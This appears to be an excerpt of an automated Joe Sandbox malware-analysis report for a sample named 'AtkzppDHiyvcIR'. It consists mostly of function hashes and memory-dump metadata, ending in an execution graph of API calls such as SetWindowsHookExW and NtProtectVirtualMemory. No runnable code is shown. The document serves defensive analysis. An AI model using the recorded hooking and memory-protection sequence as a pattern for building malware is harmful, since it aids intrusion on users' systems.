                                  • Instruction ID: c3b4e038527439f2e690484ec24ab2b6af4eff21763be27039536d626eff57cc
                                  • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction Fuzzy Hash: D6117976504280DFDB15CF14E584B15FBA1FB84318F24C6A9E8494B696C33AE85ACB62
                                  Function 00A3D1AF Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1512812191.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_a3d000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction ID: 5599f023b447d9576c52248841e1afca8eaa26c54b4a12d0efbf7e0b6213ea56
                                  • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction Fuzzy Hash: 36119075504240DFDB15CF50D5C4B56FF61FB84314F24C6A9E8494B696C33AD84ACB51
                                  Function 072C4DD0 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd931783877d7793b6db208cf99c6970d02134aee84a310348cb9c440ea14a33
                                  • Instruction ID: 693b92ca921017208bbea5dc51f989414b3c874b39813cfc5a0235d678ac928a
                                  • Opcode Fuzzy Hash: dd931783877d7793b6db208cf99c6970d02134aee84a310348cb9c440ea14a33
                                  • Instruction Fuzzy Hash: 6F018132604296AFCB029F689C0489EBFBAFF892107148027F905C3351DB318D21DB90
                                  Function 072C7D58 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2c781e6cd6203e89380b39af88e5b826ebc8c41ec2f642a521d19b66d5c804d2
                                  • Instruction ID: aefcbea038499ebd6a75c64936553808af38937dff34a186b1dd48a224009378
                                  • Opcode Fuzzy Hash: 2c781e6cd6203e89380b39af88e5b826ebc8c41ec2f642a521d19b66d5c804d2
                                  • Instruction Fuzzy Hash: 4C01D2B097C3858FD302D664C4042B97FB29B5331AF18C1EEC4554F68AC77A8486CB62
                                  Function 072C2800 Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8fb39819165226b63fbbf3cc26a3592fda4d7be010e73c0ed5d71e1bf4d692df
                                  • Instruction ID: cbf41b3a9116df7925b69d2f5bcd8438b3ac952973b306d8acc4e1574113acc3
                                  • Opcode Fuzzy Hash: 8fb39819165226b63fbbf3cc26a3592fda4d7be010e73c0ed5d71e1bf4d692df
                                  • Instruction Fuzzy Hash: B4F0F636700300DFD3169F68E405A86BFB2FFC9322F15807BE189CB291DA348806CBA0
                                  Function 072C4DE0 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cbc44d46a8a17b789ae41ad87a9f2be5bbcba60f3e2919c945589d672d4e8d5d
                                  • Instruction ID: ea2943a709226fe0e8671da54ecf1c0a4b14ab1ea62c80e9315669ee608f11eb
                                  • Opcode Fuzzy Hash: cbc44d46a8a17b789ae41ad87a9f2be5bbcba60f3e2919c945589d672d4e8d5d
                                  • Instruction Fuzzy Hash: 58F01235710219AF9B055F59D84586EBFAAFB8C2207108027FD15C3350DF718D219B90
                                  Function 072CA2D0 Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46059fa4a05c993dd124ceb3e491114eab38439e72ee6a5af9f29a2a891bfd35
                                  • Instruction ID: 7e8c1e387305e9282f8b9442f8e7b74b4e0f5bbedf6791951985b88aa1a91aab
                                  • Opcode Fuzzy Hash: 46059fa4a05c993dd124ceb3e491114eab38439e72ee6a5af9f29a2a891bfd35
                                  • Instruction Fuzzy Hash: 36F082B2614109AFDF08DF64E85599E7FAAEF54260F1482AAE408DB220EA31E9508790
                                  Function 072C8F1C Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8895672f5bc0233f6f7fd2c122e014f79a3572d8fd7afd4a990973df6d45bc01
                                  • Instruction ID: 0c5812a3895143f866bdfd844587d31d361d55a3b777f01af720967709e4304a
                                  • Opcode Fuzzy Hash: 8895672f5bc0233f6f7fd2c122e014f79a3572d8fd7afd4a990973df6d45bc01
                                  • Instruction Fuzzy Hash: 4EF0B4E1D3C1D0CFC311C69859541B13BA5EA77102F8587CFB4478E5A5E6B944018397
                                  Function 072CBBED Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c7b8d9f95465d8417b696c15ebf216cb8d679a237c639e03d6e008aeef85b9cd
                                  • Instruction ID: 7bb85a38782f0ae56d7fb5ba3cc108f269ff3124a8d8bde5f74b2754afbeee65
                                  • Opcode Fuzzy Hash: c7b8d9f95465d8417b696c15ebf216cb8d679a237c639e03d6e008aeef85b9cd
                                  • Instruction Fuzzy Hash: F3F06274A101088FCB44EF98C592B9DBBF2FF98320F288559A409A7344CA31AD43CB81
                                  Function 072CAEEA Relevance: .0, Instructions: 30COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 461e2b72b0a20be77340a1ec0481e2cfeddba661846d519d77f8a86ffcd8de6d
                                  • Instruction ID: ac32eae2668391dbcfbc3c61c9303a9707f78f71d415bb79f0aa4535702c5cbc
                                  • Opcode Fuzzy Hash: 461e2b72b0a20be77340a1ec0481e2cfeddba661846d519d77f8a86ffcd8de6d
                                  • Instruction Fuzzy Hash: 01F09670A55345DFDB01DB74CC4A9ADBB72AF56300F00C256E5125A1D1C7744855DB51
                                  Function 072C20C8 Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 714dfe4ea22f05113a8d16b6333890f6aa03a647b591e6b1d9d6a3b2a4c9a965
                                  • Instruction ID: 503cb3169404efb8ea84db265e561782be0966238bfd70b2765bcc6b52ce752c
                                  • Opcode Fuzzy Hash: 714dfe4ea22f05113a8d16b6333890f6aa03a647b591e6b1d9d6a3b2a4c9a965
                                  • Instruction Fuzzy Hash: 10E026226082008BD3026B7328162F637AADF42406B0740A6E185CB2C2CA1C89028391
                                  Function 072C0DE8 Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1969b2739e59a279129f56401d0335c6eadbe8a035ddf0640a3b6c57f1059e06
                                  • Instruction ID: 2946ab37f0e50ae2b846713d0771d050b28fab2a6270bd799b39178434d30d03
                                  • Opcode Fuzzy Hash: 1969b2739e59a279129f56401d0335c6eadbe8a035ddf0640a3b6c57f1059e06
                                  • Instruction Fuzzy Hash: 63E06D7041978D9ECB12EF348C0409A3FF86F12210B01C5AAE888CA012E63496A8DB90
                                  Function 072CB8E8 Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5a39bcc4faae81261be2b8df915b2ccf59e46012aa79a10abb30722ddde221f8
                                  • Instruction ID: 2e5b354b0e6b0f9502c5f79944352a04ee1159b9037f7e98c67f4f1711c7606a
                                  • Opcode Fuzzy Hash: 5a39bcc4faae81261be2b8df915b2ccf59e46012aa79a10abb30722ddde221f8
                                  • Instruction Fuzzy Hash: 9EE0E5E5E3D588CB9720DAA869531383B609B6B122F0447CFD88A97642D9A50A109FA3
                                  Function 072CC0C8 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 441ac9ed6120ae06dcb7139feb9c6b00bba2cfcb9a5cb41a5edd33110b4aee66
                                  • Instruction ID: 7b1fed7c22b449b22f8c64dd43f7f772d291339f423b4b910d6848faba101277
                                  • Opcode Fuzzy Hash: 441ac9ed6120ae06dcb7139feb9c6b00bba2cfcb9a5cb41a5edd33110b4aee66
                                  • Instruction Fuzzy Hash: EFE0D8F0938648EBE320CB69941676037A9FB56301F00839FE44FAA640DAE148C24773
                                  Function 072C9D78 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 06d747d6e4f650cf1aaabab1eff938d511866034f5201e6c092de9c19fe192b4
                                  • Instruction ID: 02f3250404bce94a104f1680424b5f1f4ef737af1a553d5e50c813c4613c04c9
                                  • Opcode Fuzzy Hash: 06d747d6e4f650cf1aaabab1eff938d511866034f5201e6c092de9c19fe192b4
                                  • Instruction Fuzzy Hash: BFE0206053C204CFC248F754440F73577669B63301F00426F90CB6968DDDE174D18687
                                  Function 072C8140 Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 088ea9b60b1b68da93e10d59c0587271783a3e884694772ef44e36ddfb870277
                                  • Instruction ID: 4fde241dba398012dc01b8df939d7831b553746ccdb7bb7d6082a30e9de38a7b
                                  • Opcode Fuzzy Hash: 088ea9b60b1b68da93e10d59c0587271783a3e884694772ef44e36ddfb870277
                                  • Instruction Fuzzy Hash: 9EE092742297828FD301EB64C8692267BB0EF46204F04C5DB94558B297CA34A80AC752
                                  Function 072C9D88 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4cd0cc55ff93abfdf722efe337492bc7232f9c6f4cd3fe63202110d59ebd49d3
                                  • Instruction ID: 5caf9f317e5dbde6ead9bc72337cec62f9d19b8a7ad9ee991b7e8ef79a280a81
                                  • Opcode Fuzzy Hash: 4cd0cc55ff93abfdf722efe337492bc7232f9c6f4cd3fe63202110d59ebd49d3
                                  • Instruction Fuzzy Hash: 22D05B9067C144CBC548F664540D63976569BB2711F00436E50CFB978EDDD2B8D082D7
                                  Function 072CB8F8 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 679a4d55441c7ba721a2f49713090a838268511859591b99d90361d49c25356c
                                  • Instruction ID: 7122cc1ac5b27f8579b38f55bec8d85112f1e42d550d3c05cbfdf190d02f099c
                                  • Opcode Fuzzy Hash: 679a4d55441c7ba721a2f49713090a838268511859591b99d90361d49c25356c
                                  • Instruction Fuzzy Hash: B2D017E0E3C20CDB4220E698684313976A8A77B122F004BCFA80B87304D9E10B004FE3
                                  Function 072CAE9E Relevance: .0, Instructions: 18COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37b2be367eb54e6cad215d999e3a430e711237ed5e78e14ab226de302ebd44de
                                  • Instruction ID: f35e32abf1c3605867c4da467f4093c4b86b4262b8bbc4dd662becea5442062c
                                  • Opcode Fuzzy Hash: 37b2be367eb54e6cad215d999e3a430e711237ed5e78e14ab226de302ebd44de
                                  • Instruction Fuzzy Hash: EFE04FB1D2474ACFC705CF64895626ABBB17F62310F14C16AD01486211D77409058BD2
                                  Function 072CB059 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46b5258bf6414b23f3215fe1032b1e342a00606f40b81b76253bd9c979cbfab1
                                  • Instruction ID: e0e1745f2b3d9a2e08d5ac59cf6fc437817115ff071da22724842721f7ba6252
                                  • Opcode Fuzzy Hash: 46b5258bf6414b23f3215fe1032b1e342a00606f40b81b76253bd9c979cbfab1
                                  • Instruction Fuzzy Hash: B2D05E65F34248ABE704EB71984267E26A3B7A4720F98C429684AD7384DDB08D028B52
                                  Function 072C0DF8 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31c44cfea115befadb884885afd4d0ddb14f158ef374371cb389c4e57286859b
                                  • Instruction ID: 454765f8b98b7867848c2862812ed1d8773e25798d2759e97ffe26d5c31dd80d
                                  • Opcode Fuzzy Hash: 31c44cfea115befadb884885afd4d0ddb14f158ef374371cb389c4e57286859b
                                  • Instruction Fuzzy Hash: 4BE0E27186060DDE8B60EE78D90859A7BE8AB15224F00C62AE8499A110EA30D2E8DB80
                                  Function 072C20D8 Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7b6dffb2e902afa8323cd0e371345064962fef9aea0722f725edfe64c77e5ff
                                  • Instruction ID: 1de6153e7740466d9eec183c731aac04515c25361f8ca6fa18f76e3674d130d3
                                  • Opcode Fuzzy Hash: d7b6dffb2e902afa8323cd0e371345064962fef9aea0722f725edfe64c77e5ff
                                  • Instruction Fuzzy Hash: 82D0A730704205C793017FB7681637B73DFEB805427428065E20AC2285CF2CD8018651
                                  Function 072CC0A0 Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e116226effbfa8bbadb72d19f2cadfc46365b9e548db50bbd7ba313a353247d2
                                  • Instruction ID: b83439ad24b3fa78c6be7cebbb062590cc75fb9992156f2294f535da5f455956
                                  • Opcode Fuzzy Hash: e116226effbfa8bbadb72d19f2cadfc46365b9e548db50bbd7ba313a353247d2
                                  • Instruction Fuzzy Hash: 96C012E06BCA08CBB000E2A824255383A5DE9BB202F10430FE10F8A202EAD248C10633
                                  Function 072C6681 Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3fade35b5375e9f7560774ca480781cab96e64cc108604b951d9521959261bc8
                                  • Instruction ID: 6837e2e04777fd3c58b482f05821ec0548f167407786bbe4692d7ca1cfa7d310
                                  • Opcode Fuzzy Hash: 3fade35b5375e9f7560774ca480781cab96e64cc108604b951d9521959261bc8
                                  • Instruction Fuzzy Hash: 0DC012A103C3D89BC31612B4B40A1B7BF384413124B0A059BE5558D493859D28D0C6A2
                                  Function 072CE318 Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e4d2c889cbda3f3abcaa23e93894c45012534c7ebba73c64f96d0be4100e16c6
                                  • Instruction ID: f1ba68a933f2c2c281c80348fb820840ad17779d0cc33aa0707ced4a186a0fdc
                                  • Opcode Fuzzy Hash: e4d2c889cbda3f3abcaa23e93894c45012534c7ebba73c64f96d0be4100e16c6
                                  • Instruction Fuzzy Hash: F5C08CB1040346CBD3206BDCA70E32837A85B10212F810011E019820A0CB7820D0CA76
                                  Function 072CBCB0 Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d136baa6a11dd4b071a14a00d2d0c670e9c93a65fb3dfb2e09a5495d48428d3c
                                  • Instruction ID: 7aed68f3586d53abc84b96752079bfada90c4fe9695c0519772f3a9f07728680
                                  • Opcode Fuzzy Hash: d136baa6a11dd4b071a14a00d2d0c670e9c93a65fb3dfb2e09a5495d48428d3c
                                  • Instruction Fuzzy Hash: C3D0C9B2428150DFC300CB55DD968883BF0BE1A201745098AC0054B262D220A4118B81
                                  Function 072CA2A8 Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c396bf5d9e9ea296d9445eb550bdf5f7d73a7ac0c88fb7a910ffa7be8451f0c3
                                  • Instruction ID: cd5718914deaf5692639dc62b55573f8fb7fbb1eb08095058155d9e24175fdc6
                                  • Opcode Fuzzy Hash: c396bf5d9e9ea296d9445eb550bdf5f7d73a7ac0c88fb7a910ffa7be8451f0c3
                                  • Instruction Fuzzy Hash: 7AB092E39208428AF701A8B4CA2BB651E00DBB1205B1942144B08A024CD619E12B40A7
                                  Function 072CC2F0 Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 42ad1a50f986c4e2d8decafac4f6786bc6a2d4ebde51cac54f0dc3d8da893079
                                  • Instruction ID: 2f69a990563d453b4f7e166333721943eda336cbf3d3182c0f203d1d94b1dfab
                                  • Opcode Fuzzy Hash: 42ad1a50f986c4e2d8decafac4f6786bc6a2d4ebde51cac54f0dc3d8da893079
                                  • Instruction Fuzzy Hash: 4AB092E403C26CC30540E1D820291353A1C6027A01E00031EA14F249010BC314D10073
                                  Function 072C770C Relevance: .0, Instructions: 8COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37d7cc66bf7dcfeffd91d7afa613574cbd161d991973b2df73f47d21c7907d9b
                                  • Instruction ID: 91d200c1f37be0983cb37541cb8566e4ab7adcbc0ffadfc38620cc1a9aa475ef
                                  • Opcode Fuzzy Hash: 37d7cc66bf7dcfeffd91d7afa613574cbd161d991973b2df73f47d21c7907d9b
                                  • Instruction Fuzzy Hash: 2DB012B51B9704E35401F3F44C89E2A5560FBB2701F40CF09330D2002485B5442DD617
                                  Function 072CB9C1 Relevance: .0, Instructions: 8COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 19a9afb411ddfaecbce09f07fee1a0267f6849c6df284200cc42abc31b830dfa
                                  • Instruction ID: e51216e7294e309151318364f0f34913ed079cbc39fa220ec5916cbe8ca8931d
                                  • Opcode Fuzzy Hash: 19a9afb411ddfaecbce09f07fee1a0267f6849c6df284200cc42abc31b830dfa
                                  • Instruction Fuzzy Hash: 15C04CF0BB4219EFDB21CA51EF47D6C76766B16A01F520668A6026A1D4D7A046418A40
                                  Function 072C6690 Relevance: .0, Instructions: 7COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 84e6ec2290c1844fb9aad652b39c4f38449cf7bab70d786ab75e3122948217b4
                                  • Instruction ID: d6e9754343cacb81201fb1ce374a04254cfa4efcd7b5674505b8592bc642cdaa
                                  • Opcode Fuzzy Hash: 84e6ec2290c1844fb9aad652b39c4f38449cf7bab70d786ab75e3122948217b4
                                  • Instruction Fuzzy Hash: E9A012A003820CD6420851547009236FB3C1011204B50050CE90A0804056DE3460C044

                                  Execution Graph

                                  Execution Coverage:11.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:34
                                  Total number of Limit Nodes:3
                                  execution_graph 13758 30f0d0c 13759 30f0d11 13758->13759 13762 30f50ba 13759->13762 13760 30f0e29 13763 30f50d8 13762->13763 13767 30f5202 13763->13767 13771 30f5210 13763->13771 13764 30f513a 13764->13760 13768 30f522f 13767->13768 13775 30f3798 13768->13775 13772 30f522f 13771->13772 13773 30f3798 SetWindowsHookExW 13772->13773 13774 30f5255 13773->13774 13774->13774 13776 30f5360 SetWindowsHookExW 13775->13776 13778 30f5255 13776->13778 13779 30f0c48 13780 30f0c68 13779->13780 13782 30f50ba SetWindowsHookExW 13780->13782 13781 30f0e29 13782->13781 13785 30fa618 13786 30fa65e GetCurrentProcess 13785->13786 13788 30fa6a9 13786->13788 13789 30fa6b0 GetCurrentThread 13786->13789 13788->13789 13790 30fa6ed GetCurrentProcess 13789->13790 13791 30fa6e6 13789->13791 13792 30fa723 13790->13792 13791->13790 13793 30fa74b GetCurrentThreadId 13792->13793 13794 30fa77c 13793->13794 13795 30f3397 13796 30f32c3 NtProtectVirtualMemory 13795->13796 13799 30f33a2 13795->13799 13798 30f3368 13796->13798 13783 30fa860 DuplicateHandle 13784 30fa8f6 13783->13784

                                  Executed Functions

                                  Function 030F2E7A Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 456nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
